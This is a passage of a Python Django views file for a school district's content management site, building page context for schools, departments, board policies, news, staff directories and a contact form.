'documents_schoolcommunitycouncilmeetingminutes_node', queryset=prefetchqs, ) ) return qs def prefetch_contentbanner_detail(qs): prefetchqs = ( ContentBanner .objects .filter(deleted=0) .filter(published=1) .only( 'image_file', 'alttext', 'related_node_id', ) .order_by('inline_order') ) return qs.prefetch_related( Prefetch( 'images_contentbanner_node', queryset=prefetchqs, ) ) def prefetch_actionbuttons_detail(qs): prefetchqs = ( ActionButton .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', 'link_url', 'inline_order', 'related_node', ) .order_by('inline_order') ) return qs.prefetch_related( Prefetch( 'links_actionbutton_node', queryset=prefetchqs, ) ) def prefetch_resourcelinks_detail(qs): prefetchqs = ( ResourceLink .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', 'link_url', 'inline_order', 'related_node', ) .order_by('inline_order') ) return qs.prefetch_related( Prefetch( 'links_resourcelink_node', queryset=prefetchqs, ) ) def prefetch_classwebsite_detail(qs): prefetchqs = ( ClassWebsite .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', 'link_url', 'inline_order', 'related_node', ) ) return qs.prefetch_related( Prefetch( 'links_classwebsite_node', queryset=prefetchqs, ) ) def prefetch_announcement_detail(qs): prefetchqs = ( Announcement .objects .filter(deleted=0) .filter(published=1) .order_by('inline_order') ) return qs.prefetch_related( Prefetch( 'pages_announcement_node', queryset=prefetchqs, ) ) def prefetch_subjectgradelevel_detail(qs): activesubjects = [] page = qs[0] for person in page.directoryentries_schoolfaculty_node.all(): if person.primary_subject.pk not in activesubjects: activesubjects.append(person.primary_subject.pk) prefetchqs = ( SubjectGradeLevel .objects .filter(deleted=0) .filter(published=1) .filter(pk__in=activesubjects) .order_by('inline_order') ) return qs.prefetch_related( Prefetch( 'taxonomy_subjectgradelevel_node', queryset=prefetchqs, ) ) def prefetch_schooladministration_detail(qs): prefetchqs = ( SchoolAdministration .objects .filter(deleted=0) .filter(published=1) .filter(employee__is_active=True) .filter(employee__is_staff=True) .order_by('inline_order') .prefetch_related( Prefetch( 'employee', queryset=( Employee .objects .filter(is_active=True) .filter(is_staff=True) .only( 'pk', 'last_name', 'first_name', 'email', 'job_title', ) ) ) ) ) return qs.prefetch_related( Prefetch( 'directoryentries_schooladministration_node', queryset=prefetchqs, ) ) def prefetch_schoolstaff_detail(qs): prefetchqs = ( SchoolStaff .objects .filter(deleted=0) .filter(published=1) .filter(employee__is_active=True) .filter(employee__is_staff=True) .order_by('inline_order') .prefetch_related( Prefetch( 'employee', queryset=( Employee .objects .filter(is_active=True) .filter(is_staff=True) .only( 'pk', 'last_name', 'first_name', 'email', 'job_title', ) ) ) ) ) return qs.prefetch_related( Prefetch( 'directoryentries_schoolstaff_node', queryset=prefetchqs, ) ) def prefetch_schoolfaculty_detail(qs): prefetchqs = ( SchoolFaculty .objects .filter(deleted=0) .filter(published=1) .filter(employee__is_active=True) .filter(employee__is_staff=True) .prefetch_related( Prefetch( 'employee', queryset=( Employee .objects .filter(is_active=True) .filter(is_staff=True) .only( 'pk', 'last_name', 'first_name', 'email', 'job_title', ) ) ) ) .order_by( 'employee__first_name', 'employee__last_name', ) ) return qs.prefetch_related( Prefetch( 'directoryentries_schoolfaculty_node', queryset=prefetchqs, ) ) def prefetch_subpage_detail(qs): prefetchqs = ( SubPage .objects .filter(deleted=0) .filter(published=1) .only( 'title', 'url', 'inline_order', 'related_node_id', ) ) return qs.prefetch_related( Prefetch( 'pages_subpage_node', queryset=prefetchqs, ) ) def add_additional_context(request, context, node): if request.path == '/' or request.path == '/home/': context['supermessage'] = ( SuperintendentMessage .objects .filter(deleted=0) .filter(published=1) .order_by('-author_date') .only( 'title', 'author_date', 'summary', 'url', )[:1] ) context['news'] = ( News .objects .filter(deleted=0) .filter(published=1) .order_by( '-pinned', '-author_date', ) .only( 'title', 'author_date', 'summary', 'url', ) .prefetch_related( Prefetch( 'images_newsthumbnail_node', queryset=( NewsThumbnail .objects .only( 'image_file', 'alttext', 'related_node_id', ) ) ) )[0:5] ) if request.path == '/departments/department-structure/': context['departments'] = ( prefetch_building_location_detail( Department .objects .filter(deleted=0) .filter(published=1) .order_by('lft') ) ) if request.path == '/board-of-education/policies/': district_policies = ( BoardPolicy .objects .filter(deleted=0) .filter(published=1) .order_by('section__lft','index') .only('pk','policy_title','index','section','related_node') .prefetch_related( Prefetch('section', queryset= BoardPolicySection.objects.filter(deleted=0).filter(published=1).only('pk','section_prefix','description')),Prefetch('directoryentries_boardpolicyadmin_node',queryset=BoardPolicyAdmin.objects.filter(deleted=0).filter(published=1).order_by('title').only('pk','employee','related_node').prefetch_related(Prefetch('employee',queryset=Employee.objects.filter(is_active=1).filter(is_staff=1).only('pk','last_name','first_name')))),Prefetch('documents_policy_node', queryset = Policy.objects.filter(deleted=0).filter(published=1).only('pk','related_node').prefetch_related(Prefetch('files_file_node', queryset = File.objects.filter(deleted=0).filter(published=1).order_by('file_language__lft','file_language__title').only('title','file_file','file_language','related_node').prefetch_related(Prefetch('file_language',queryset=Language.objects.filter(deleted=0).filter(published=1).only('title')))))),Prefetch('documents_administrativeprocedure_node', queryset = AdministrativeProcedure.objects.filter(deleted=0).filter(published=1).only('pk','related_node').prefetch_related(Prefetch('files_file_node', queryset = File.objects.filter(deleted=0).filter(published=1).order_by('file_language__lft','file_language__title').only('title','file_file','file_language','related_node').prefetch_related(Prefetch('file_language',queryset=Language.objects.filter(deleted=0).filter(published=1).only('title')))))),Prefetch('documents_supportingdocument_node', queryset = SupportingDocument.objects.filter(deleted=0).filter(published=1).only('pk','document_title','related_node').prefetch_related(Prefetch('files_file_node', queryset = File.objects.filter(deleted=0).filter(published=1).order_by('file_language__lft','file_language__title').only('title','file_file','file_language','related_node').prefetch_related(Prefetch('file_language',queryset=Language.objects.filter(deleted=0).filter(published=1).only('title'))))))) ) board_policies = [] community_policies = [] financial_policies = [] general_policies = [] instructional_policies = [] personnel_policies = [] student_policies = [] for policy in district_policies: if policy.section.title == 'Board Policies': board_policies.append(policy) if policy.section.title == 'Community Policies': community_policies.append(policy) if policy.section.title == 'Financial Policies': financial_policies.append(policy) if policy.section.title == 'General Policies': general_policies.append(policy) if policy.section.title == 'Instructional Policies': instructional_policies.append(policy) if policy.section.title == 'Personnel Policies': personnel_policies.append(policy) if policy.section.title == 'Student Policies': student_policies.append(policy) context['board_policies'] = board_policies context['community_policies'] = community_policies context['financial_policies'] = financial_policies context['general_policies'] = general_policies context['instructional_policies'] = instructional_policies context['personnel_policies'] = personnel_policies context['student_policies'] = student_policies if request.path == '/board-of-education/policies/policy-review-schedule/': context['policy_review'] = OrderedDict() policy_review = ( BoardPolicy .objects .filter(deleted=0) .filter(published=1) .exclude(subcommittee_review=None) .exclude(boardmeeting_review=None) .order_by( 'subcommittee_review', 'section__lft', 'index') .only( 'pk', 'policy_title', 'index', 'section', 'subcommittee_review', 'boardmeeting_review', 'last_approved', 'related_node', ) .prefetch_related( Prefetch( 'section', queryset=( BoardPolicySection .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'section_prefix', ) ) ) ) ) for policy in policy_review: strdate = '{0}{1}'.format( policy.subcommittee_review.strftime('%Y%m%d'), policy.boardmeeting_review.strftime('%Y%m%d'), ) if strdate not in context['policy_review']: context['policy_review'][strdate] = {} context['policy_review'][strdate]['subcommittee_review'] = ( policy.subcommittee_review.strftime('%m/%d/%Y') ) context['policy_review'][strdate]['boardmeeting_review'] = ( policy.boardmeeting_review.strftime('%m/%d/%Y') ) context['policy_review'][strdate]['policies'] = [] context['policy_review'][strdate]['policies'].append(policy) if node.content_type == 'newsyear': context['newsyears'] = NewsYear.objects.all().order_by('-yearend') context['news'] = ( News. objects .filter(parent__url=request.path) .filter(deleted=0) .filter(published=1) .only( 'title', 'author_date', 'summary', 'url', ) .prefetch_related( Prefetch( 'images_newsthumbnail_node', queryset=( NewsThumbnail .objects .only( 'image_file', 'alttext', 'related_node_id', ) ) ) ) ) newsmonths = [ {'month': 'June', 'news': [], }, {'month': 'May', 'news': [], }, {'month': 'April', 'news': [], }, {'month': 'March', 'news': [], }, {'month': 'February', 'news': [], }, {'month': 'January', 'news': [], }, {'month': 'December', 'news': [], }, {'month': 'November', 'news': [], }, {'month': 'October', 'news': [], }, {'month': 'September', 'news': [], }, {'month': 'August', 'news': [], }, {'month': 'July', 'news': [], }, ] for item in context['news']: if item.author_date.month == 6: newsmonths[0]['news'].append(item) if item.author_date.month == 5: newsmonths[1]['news'].append(item) if item.author_date.month == 4: newsmonths[2]['news'].append(item) if item.author_date.month == 3: newsmonths[3]['news'].append(item) if item.author_date.month == 2: newsmonths[4]['news'].append(item) if item.author_date.month == 1: newsmonths[5]['news'].append(item) if item.author_date.month == 12: newsmonths[6]['news'].append(item) if item.author_date.month == 11: newsmonths[7]['news'].append(item) if item.author_date.month == 10: newsmonths[8]['news'].append(item) if item.author_date.month == 9: newsmonths[9]['news'].append(item) if item.author_date.month == 8: newsmonths[10]['news'].append(item) if item.author_date.month == 7: newsmonths[11]['news'].append(item) context['newsmonths'] = newsmonths if request.path == '/schools/' or request.path == '/schools/school-registration-dates/': schools = ( School .objects .filter(deleted=0) .filter(published=1) .order_by('title') .only( 'pk', 'title', 'school_number', 'building_location', 'schooltype', 'schooloptions', 'website_url', 'scc_url', 'calendar_url', 'donate_url', 'boundary_map', 'url', 'main_phone', ) .prefetch_related( Prefetch( 'schooltype', queryset=( SchoolType .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'schooloptions', queryset=( SchoolOption .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'building_location', queryset=( Location .objects .only( 'street_address', 'location_city', 'location_state', 'location_zipcode', 'google_place', ) .prefetch_related( Prefetch( 'location_city', queryset=( City .objects .only('title') ) ), Prefetch( 'location_state', queryset=( State .objects .only('title') ) ), Prefetch( 'location_zipcode', queryset=( Zipcode .objects .only('title') ) ) ) ) ), Prefetch( 'images_thumbnail_node', queryset=( Thumbnail .objects .only( 'image_file', 'alttext', 'related_node_id', ) ) ) ) ) context['elementary_schools_directory'] = [] context['k8_schools_directory'] = [] context['middle_schools_directory'] = [] context['high_schools_directory'] = [] context['charter_schools_directory'] = [] context['community_learning_centers_directory'] = [] for school in schools: if school.schooltype.title == 'Elementary Schools': context['elementary_schools_directory'].append(school) if school.schooltype.title == 'K-8 Schools': context['k8_schools_directory'].append(school) if school.schooltype.title == 'Middle Schools': context['middle_schools_directory'].append(school) if school.schooltype.title == 'High Schools': context['high_schools_directory'].append(school) if school.schooltype.title == 'Charter Schools': context['charter_schools_directory'].append(school) if school.schooltype.title == 'Community Learning Centers': context['community_learning_centers_directory'].append(school) context['learningoptions'] = SchoolOption.objects.filter(deleted=0).filter(published=1).order_by('title') context['school_reg_dates'] = cache.get_or_set('school_reg_dates', updates_school_reg_dates(), 120) if request.path == '/schools/elementary-schools/': schools = ( School .objects .filter(deleted=0) .filter(published=1) .order_by('title') .only( 'pk', 'title', 'building_location', 'schooltype', 'schooloptions', 'website_url', 'scc_url', 'calendar_url', 'donate_url', 'boundary_map', 'url', 'main_phone', ) .prefetch_related( Prefetch( 'schooltype', queryset=( SchoolType .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'schooloptions', queryset=( SchoolOption .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'building_location', queryset=( Location .objects .only( 'street_address', 'location_city', 'location_state', 'location_zipcode', 'google_place', ) .prefetch_related( Prefetch( 'location_city', queryset=( City .objects .only('title') ) ), Prefetch( 'location_state', queryset=( State .objects .only('title') ) ), Prefetch( 'location_zipcode', queryset=( Zipcode .objects .only('title') ) ) ) ) ), Prefetch( 'images_thumbnail_node', queryset=( Thumbnail .objects .only( 'image_file', 'alttext', 'related_node_id', ) ) ) ) ) context['schools'] = [] for school in schools: if school.schooltype.title == 'Elementary Schools': context['schools'].append(school) context['learningoptions'] = SchoolOption.objects.filter(deleted=0).filter(published=1).order_by('title') if request.path == '/schools/k-8-schools/': schools = ( School .objects .filter(deleted=0) .filter(published=1) .order_by('title') .only( 'pk', 'title', 'building_location', 'schooltype', 'schooloptions', 'website_url', 'scc_url', 'calendar_url', 'donate_url', 'boundary_map', 'url', 'main_phone', ) .prefetch_related( Prefetch( 'schooltype', queryset=( SchoolType .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'schooloptions', queryset=( SchoolOption .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'building_location', queryset=( Location .objects .only( 'street_address', 'location_city', 'location_state', 'location_zipcode', 'google_place', ) .prefetch_related( Prefetch( 'location_city', queryset=( City .objects .only('title') ) ), Prefetch( 'location_state', queryset=( State .objects .only('title') ) ), Prefetch( 'location_zipcode', queryset=( Zipcode .objects .only('title') ) ) ) ) ), Prefetch( 'images_thumbnail_node', queryset=( Thumbnail .objects .only( 'image_file', 'alttext', 'related_node_id', ) ) ) ) ) context['schools'] = [] for school in schools: if school.schooltype.title == 'K-8 Schools': context['schools'].append(school) context['learningoptions'] = SchoolOption.objects.filter(deleted=0).filter(published=1).order_by('title') if request.path == '/schools/middle-schools/': schools = ( School .objects .filter(deleted=0) .filter(published=1) .order_by('title') .only( 'pk', 'title', 'building_location', 'schooltype', 'schooloptions', 'website_url', 'scc_url', 'calendar_url', 'donate_url', 'boundary_map', 'url', 'main_phone', ) .prefetch_related( Prefetch( 'schooltype', queryset=( SchoolType .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'schooloptions', queryset=( SchoolOption .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'building_location', queryset=( Location .objects .only( 'street_address', 'location_city', 'location_state', 'location_zipcode', 'google_place', ) .prefetch_related( Prefetch( 'location_city', queryset=( City .objects .only('title') ) ), Prefetch( 'location_state', queryset=( State .objects .only('title') ) ), Prefetch( 'location_zipcode', queryset=( Zipcode .objects .only('title') ) ) ) ) ), Prefetch( 'images_thumbnail_node', queryset=( Thumbnail .objects .only( 'image_file', 'alttext', 'related_node_id', ) ) ) ) ) context['schools'] = [] for school in schools: if school.schooltype.title == 'Middle Schools': context['schools'].append(school) context['learningoptions'] = SchoolOption.objects.filter(deleted=0).filter(published=1).order_by('title') if request.path == '/schools/high-schools/': schools = ( School .objects .filter(deleted=0) .filter(published=1) .order_by('title') .only( 'pk', 'title', 'building_location', 'schooltype', 'schooloptions', 'website_url', 'scc_url', 'calendar_url', 'donate_url', 'boundary_map', 'url', 'main_phone', ) .prefetch_related( Prefetch( 'schooltype', queryset=( SchoolType .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'schooloptions', queryset=( SchoolOption .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'building_location', queryset=( Location .objects .only( 'street_address', 'location_city', 'location_state', 'location_zipcode', 'google_place', ) .prefetch_related( Prefetch( 'location_city', queryset=( City .objects .only('title') ) ), Prefetch( 'location_state', queryset=( State .objects .only('title') ) ), Prefetch( 'location_zipcode', queryset=( Zipcode .objects .only('title') ) ) ) ) ), Prefetch( 'images_thumbnail_node', queryset=( Thumbnail .objects .only( 'image_file', 'alttext', 'related_node_id', ) ) ) ) ) context['schools'] = [] for school in schools: if school.schooltype.title == 'High Schools': context['schools'].append(school) context['learningoptions'] = SchoolOption.objects.filter(deleted=0).filter(published=1).order_by('title') if request.path == '/schools/charter-schools/': schools = ( School .objects .filter(deleted=0) .filter(published=1) .order_by('title') .only( 'pk', 'title', 'building_location', 'schooltype', 'schooloptions', 'website_url', 'scc_url', 'calendar_url', 'donate_url', 'boundary_map', 'url', 'main_phone', ) .prefetch_related( Prefetch( 'schooltype', queryset=( SchoolType .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'schooloptions', queryset=( SchoolOption .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'building_location', queryset=( Location .objects .only( 'street_address', 'location_city', 'location_state', 'location_zipcode', 'google_place', ) .prefetch_related( Prefetch( 'location_city', queryset=( City .objects .only('title') ) ), Prefetch( 'location_state', queryset=( State .objects .only('title') ) ), Prefetch( 'location_zipcode', queryset=( Zipcode .objects .only('title') ) ) ) ) ), Prefetch( 'images_thumbnail_node', queryset=( Thumbnail .objects .only( 'image_file', 'alttext', 'related_node_id', ) ) ) ) ) context['schools'] = [] for school in schools: if school.schooltype.title == 'Charter Schools': context['schools'].append(school) context['learningoptions'] = SchoolOption.objects.filter(deleted=0).filter(published=1).order_by('title') if request.path == '/schools/community-learning-centers/': schools = ( School .objects .filter(deleted=0) .filter(published=1) .order_by('title') .only( 'pk', 'title', 'building_location', 'schooltype', 'schooloptions', 'website_url', 'scc_url', 'calendar_url', 'donate_url', 'boundary_map', 'url', 'main_phone', ) .prefetch_related( Prefetch( 'schooltype', queryset=( SchoolType .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'schooloptions', queryset=( SchoolOption .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'building_location', queryset=( Location .objects .only( 'street_address', 'location_city', 'location_state', 'location_zipcode', 'google_place', ) .prefetch_related( Prefetch( 'location_city', queryset=( City .objects .only('title') ) ), Prefetch( 'location_state', queryset=( State .objects .only('title') ) ), Prefetch( 'location_zipcode', queryset=( Zipcode .objects .only('title') ) ) ) ) ), Prefetch( 'images_thumbnail_node', queryset=( Thumbnail .objects .only( 'image_file', 'alttext', 'related_node_id', ) ) ) ) ) context['schools'] = [] for school in schools: if school.schooltype.title == 'Community Learning Centers': context['schools'].append(school) context['learningoptions'] = SchoolOption.objects.filter(deleted=0).filter(published=1).order_by('title') if request.path == '/departments/': all_departments = ( Department .objects .filter(deleted=0) .filter(published=1) .order_by('title') .only( 'title', 'building_location', 'url', 'main_phone', 'short_description', 'is_department', ) .prefetch_related( Prefetch( 'building_location', queryset=( Location .objects .only( 'street_address', 'location_city', 'location_state', 'location_zipcode', 'google_place', ) .prefetch_related( Prefetch( 'location_city', queryset=( City .objects .only('title') ) ), Prefetch( 'location_state', queryset=( State .objects .only('title') ) ), Prefetch( 'location_zipcode', queryset=( Zipcode .objects .only('title') ) ) ) ) ) ) ) departments = { 'departments': [], 'programs': [], } for department in all_departments: if department.is_department: departments['departments'].append(department) else: departments['programs'].append(department) context['departments'] = departments if node.content_type == 'superintendentmessageyear': context['messageyears'] = SuperintendentMessageYear.objects.all().order_by('-yearend') context['superintendent_messages'] = ( SuperintendentMessage .objects .filter(parent__url=request.path) .filter(deleted=0) .filter(published=1) .only( 'title', 'author_date', 'summary', 'url', ) .prefetch_related( Prefetch( 'images_newsthumbnail_node', queryset=( NewsThumbnail .objects .only( 'image_file', 'alttext', 'related_node_id', ) ) ) ) ) messagemonths = [ {'month': 'June', 'message': [], }, {'month': 'May', 'message': [], }, {'month': 'April', 'message': [], }, {'month': 'March', 'message': [], }, {'month': 'February', 'message': [], }, {'month': 'January', 'message': [], }, {'month': 'December', 'message': [], }, {'month': 'November', 'message': [], }, {'month': 'October', 'message': [], }, {'month': 'September', 'message': [], }, {'month': 'August', 'message': [], }, {'month': 'July', 'message': [], }, ] for item in context['superintendent_messages']: if item.author_date.month == 6: messagemonths[0]['message'].append(item) if item.author_date.month == 5: messagemonths[1]['message'].append(item) if item.author_date.month == 4: messagemonths[2]['message'].append(item) if item.author_date.month == 3: messagemonths[3]['message'].append(item) if item.author_date.month == 2: messagemonths[4]['message'].append(item) if item.author_date.month == 1: messagemonths[5]['message'].append(item) if item.author_date.month == 12: messagemonths[6]['message'].append(item) if item.author_date.month == 11: messagemonths[7]['message'].append(item) if item.author_date.month == 10: messagemonths[8]['message'].append(item) if item.author_date.month == 9: messagemonths[9]['message'].append(item) if item.author_date.month == 8: messagemonths[10]['message'].append(item) if item.author_date.month == 7: messagemonths[11]['message'].append(item) context['messagemonths'] = messagemonths if request.path == '/departments/communications-and-community-relations/district-logo/': all_logos = DistrictLogo.objects.filter(deleted=0).filter(published=1).order_by('district_logo_group__lft','district_logo_style_variation__lft') districtlogos = { 'primary':[], 'primaryrev':[], 'secondary':[], 'secondaryrev':[], 'wordmark':[], } for logo in all_logos: if logo.district_logo_group.title == 'Primary Logo': districtlogos['primary'].append(logo) if logo.district_logo_group.title == 'Primary Logo Reversed': districtlogos['primaryrev'].append(logo) if logo.district_logo_group.title == 'Secondary Logo': districtlogos['secondary'].append(logo) if logo.district_logo_group.title == 'Secondary Logo Reversed': districtlogos['secondaryrev'].append(logo) if logo.district_logo_group.title == 'Wordmark': districtlogos['wordmark'].append(logo) context['districtlogos'] = districtlogos if node.content_type == 'department': context['department_children'] = ( Department .objects .filter(deleted=0) .filter(published=1) .filter(parent__url=request.path) .order_by('title') .only( 'pk', 'title', 'short_description', 'main_phone', 'building_location', 'content_type', 'menu_title', 'url', ) .prefetch_related( Prefetch( 'building_location', queryset=( Location .objects .filter(deleted=0) .filter(published=1) .only( 'street_address', 'location_city', 'location_state', 'location_zipcode', 'google_place', ) .prefetch_related( Prefetch( 'location_city', queryset=( City .objects .filter(deleted=0) .filter(published=1) .only('title') ) ), Prefetch( 'location_state', queryset=( State .objects .filter(deleted=0) .filter(published=1) .only('title') ) ), Prefetch( 'location_zipcode', queryset=( Zipcode .objects .filter(deleted=0) .filter(published=1) .only('title') ) ) ) ) ) ) ) if request.path == '/directory/': context['people'] = ( Employee .objects .filter(is_active=1) .filter(is_staff=1) .filter(in_directory=1) .order_by('last_name') .only( 'pk', 'last_name', 'first_name', 'job_title', 'email', 'department', ) .prefetch_related( Prefetch( 'department', queryset=( Node .objects .only( 'node_title', 'url', ) ) ) ) ) if request.path.startswith('/directory/last-name-'): letter = request.path[-2] context['people'] = ( Employee .objects .filter(is_active=1) .filter(is_staff=1) .filter(in_directory=1) .filter(last_name__istartswith=letter) .order_by('last_name') .only( 'pk', 'last_name', 'first_name', 'job_title', 'email', 'department', ) .prefetch_related( Prefetch( 'department', queryset=( Node .objects .only( 'node_title', 'url', ) ) ) ) ) if node.content_type == 'districtcalendaryear': context['districtcalendaryears'] = ( DistrictCalendarYear .objects .filter(deleted=0) .filter(published=1) .order_by('-yearend') ) context['districtcalendarevents'] = ( DistrictCalendarEvent .objects .filter(deleted=0) .filter(published=1) .filter(parent__url=request.path) ) if node.content_type == 'boardmeetingyear': context['board_meeting_years'] = ( BoardMeetingYear .objects .filter(deleted=0) .filter(published=1) .order_by('-yearend') ) context['board_meetings'] = ( BoardMeeting .objects .filter(deleted=0) .filter(published=1) .filter(parent__url=request.path) .order_by('-startdate') ) if ( request.method != 'POST' and ( request.path == '/contact-us/' or request.path == '/contact-us/inline/' ) ): context['form'] = contactmessage_get(request) context['from_page'] = ( commonfunctions .nodefindobject( Node.objects .get(pk=context['form'].fields['parent'].initial) ) ) try: context['in_this_section'] = ( node .get_ancestors(ascending=True) .filter( deleted=0, published=1, pagelayout__namespace='site-section.html' ).first() .get_children() .filter( node_type='pages', content_type='page', published=1, deleted=0, ) .order_by('page__page__inline_order') ) if not commonfunctions.is_siteadmin(request): context['in_this_section'] = context['in_this_section'].filter(section_page_count__gte=1) except AttributeError: pass return context def process_post(request): if ( request.method == 'POST' and ( request.path == '/contact-us/' or request.path == '/contact-us/inline/' ) ): post = contactmessage_post(request) return post.parent.url def contactmessage_post(request): form = ContactMessageForm(request.POST) if form.is_valid(): if request.user.is_anonymous: user = User.objects.get(username='AnonymousUser') else: user = User.objects.get(pk=request.user.pk) post = form.save(commit=False) message_parent = Node.objects.get(pk=post.parent.pk) if post.primary_contact == '': if message_parent.primary_contact: post.primary_contact = message_parent.primary_contact else: post.primary_contact = request.site.dashboard_general_site.primary_contact post.create_user = user post.update_user = user post.site = request.site post.searchable = False post.remote_addr = request.META['HTTP_X_FORWARDED_FOR'] post.user_agent = request.META['HTTP_USER_AGENT'] post.http_headers = json.dumps(request.META, default=str) if not post.our_message: post.save() messages.success( request, 'Thank you for contacting us. ' 'Someone will get back to you shortly.') else: messages.error( request, 'Something was wrong with your message. Please try again.') return post def contactmessage_get(request): form = ContactMessageForm() try: if request.GET['pid']: form.fields['parent'].initial = request.GET['pid'] except: form.fields['parent'].initial = commonfunctions.get_contactpage(request) try: if request.GET['cid']: form.fields['primary_contact'].initial = request.GET['cid'] except: try: form.fields['primary_contact'].initial = str(Node.objects.get(pk=form.fields['parent'].initial).primary_contact.pk) except: try: form.fields['primary_contact'].initial = str(request.site.dashboard_general_site.primary_contact.pk) except: form.fields['primary_contact'].initial = str(User.objects.get(username='webmaster@slcschools.org').pk) try: message_to = User.objects.get( pk=form.fields['primary_contact'].initial ) except User.DoesNotExist: message_to = User.objects.get( username='webmaster@slcschools.org', ) form.fields['message_to'].initial = '{0} {1}'.format( message_to.first_name, message_to.last_name, ) form.fields['message_to'].disabled = True return form # def contact(request): # template = 'cmstemplates/www_slcschools_org/pagelayouts/contact-us.html' # context = {} # context['page'] = get_object_or_404(Page, url=request.path) # context['pageopts'] = context['page']._meta # if request.method == "POST": # post = contactmessage_post(request) # return redirect(post.parent.url) # else: # context['form'] = contactmessage_get(request) # context['from_page'] = commonfunctions.nodefindobject(Node.objects.get(pk=context['form'].fields['parent'].initial)) # return render(request, template, context) # def contact_inline(request): # template = 'cmstemplates/www_slcschools_org/blocks/contact-us-inline.html' # context = {} # context['page'] = get_object_or_404(Page, url=request.path) # context['pageopts'] = context['page']._meta # if request.method == "POST": # post = contactmessage_post(request) # return redirect(post.parent.url) # else: # context['form'] = contactmessage_get(request) # context['from_page'] = commonfunctions.nodefindobject(Node.objects.get(pk=context['form'].fields['parent'].initial)) # return render(request, template, context) def node_lookup(request): if redirect_request(request) is not None: return redirect_request(request) try: if request.path == '/': node = Node.objects.get(url='/home/', site=request.site) else: node = Node.objects.get(url=request.path, site=request.site) except Node.DoesNotExist: raise Http404('Page not found.') Model = apps.get_model(node.node_type, node.content_type) if node.pagelayout.namespace == 'site-section.html': first_child = ( node .get_children() .filter( node_type='pages', content_type='page', deleted=0, published=1 ) .exclude( pagelayout__namespace='site-section.html' ) .order_by('page__page__inline_order') .first() ) if first_child: return redirect(first_child.url) else: if not commonfunctions.is_siteadmin(request): raise Http404('Page not found.') if node.pagelayout.namespace == 'disclosure-document.html': item = ( Model .objects .filter(pk=node.pk) .prefetch_related( Prefetch( 'files_file_node', queryset=( File .objects .filter(deleted=0) .filter(published=1) .order_by( 'file_language__lft', 'file_language__title', ) .only( 'title', 'file_file', 'file_language', 'related_node', ) .prefetch_related( Prefetch( 'file_language', queryset=( Language .objects .filter(deleted=0) .filter(published=1) .only('title') ) ) ) ) ) ) ) item = item.first() if item.files_file_node.all().count() == 1: return redirect(item.files_file_node.first().url) template = set_template(request, node) context = {} context['page'] = item context['pageopts'] = context['page']._meta return render(request, template, context) if node.pagelayout.namespace == 'school-community-council-meeting-agenda.html': item = ( Model .objects .filter(pk=node.pk) .prefetch_related( Prefetch( 'files_file_node', queryset=( File .objects .filter(deleted=0) .filter(published=1) .order_by( 'file_language__lft', 'file_language__title', ) .only( 'title', 'file_file', 'file_language', 'related_node', ) .prefetch_related( Prefetch( 'file_language', queryset=( Language .objects .filter(deleted=0) .filter(published=1) .only('title') ) ) ) ) ) ) ) item = item.first() if item.files_file_node.all().count() == 1: return redirect(item.files_file_node.first().url) template = set_template(request, node) context = {} context['page'] = item context['pageopts'] = context['page']._meta return render(request, template, context) if node.pagelayout.namespace == 'school-community-council-meeting-minutes.html': item = ( Model .objects .filter(pk=node.pk) .prefetch_related( Prefetch( 'files_file_node', queryset=( File .objects .filter(deleted=0) .filter(published=1) .order_by( 'file_language__lft', 'file_language__title', ) .only( 'title', 'file_file', 'file_language', 'related_node', ) .prefetch_related( Prefetch( 'file_language', queryset=( Language .objects .filter(deleted=0) .filter(published=1) .only('title') ) ) ) ) ) ) ) item = item.first() if item.files_file_node.all().count() == 1: return redirect(item.files_file_node.first().url) template = set_template(request, node) context = {} context['page'] = item context['pageopts'] = context['page']._meta return render(request, template, context) if node.node_type == 'pages': if request.method == 'POST': return redirect(process_post(request)) template = set_template(request, node) context = {} context['page'] = (Model .objects .filter(pk=node.pk) ) fields = context['page'].model._meta.get_fields(include_hidden=True) # Add prefetch function calls here if 'building_location' in fields: context['page'] = ( prefetch_building_location_detail(context['page']) ) context['page'] = prefetch_contentbanner_detail(context['page']) context['page'] = prefetch_actionbuttons_detail(context['page']) context['page'] = prefetch_boardmembers_detail(context['page']) context['page'] = prefetch_studentboardmember_detail(context['page']) context['page'] = prefetch_schooladministrators_detail(context['page']) context['page'] = prefetch_administrators_detail(context['page']) context['page'] = prefetch_staff_detail(context['page']) context['page'] = prefetch_resourcelinks_detail(context['page']) context['page'] = prefetch_documents_detail(context['page']) context['page'] = prefetch_disclosuredocuments_detail(context['page']) context['page'] = prefetch_subpage_detail(context['page']) context['page'] = prefetch_announcement_detail(context['page']) context['page'] = prefetch_schooladministration_detail(context['page']) context['page'] = prefetch_schoolstaff_detail(context['page']) context['page'] = prefetch_schoolfaculty_detail(context['page']) context['page'] = prefetch_subjectgradelevel_detail(context['page']) context['page'] = prefetch_schoolcommunitycouncilmeetings_detail(context['page']) context['page'] = prefetch_schoolcommunitycouncilmembers_detail(context['page']) # Add additional context here context = add_additional_context(request, context, node) # Change Queryset into object context['page'] = context['page'].first() context['pageopts'] = context['page']._meta context['section'] = context['page'].get_ancestors(ascending=True).filter( deleted=0, published=1, pagelayout__namespace='site-section.html' ).first() if context['section']: context['section'] = commonfunctions.nodefindobject(context['section']) 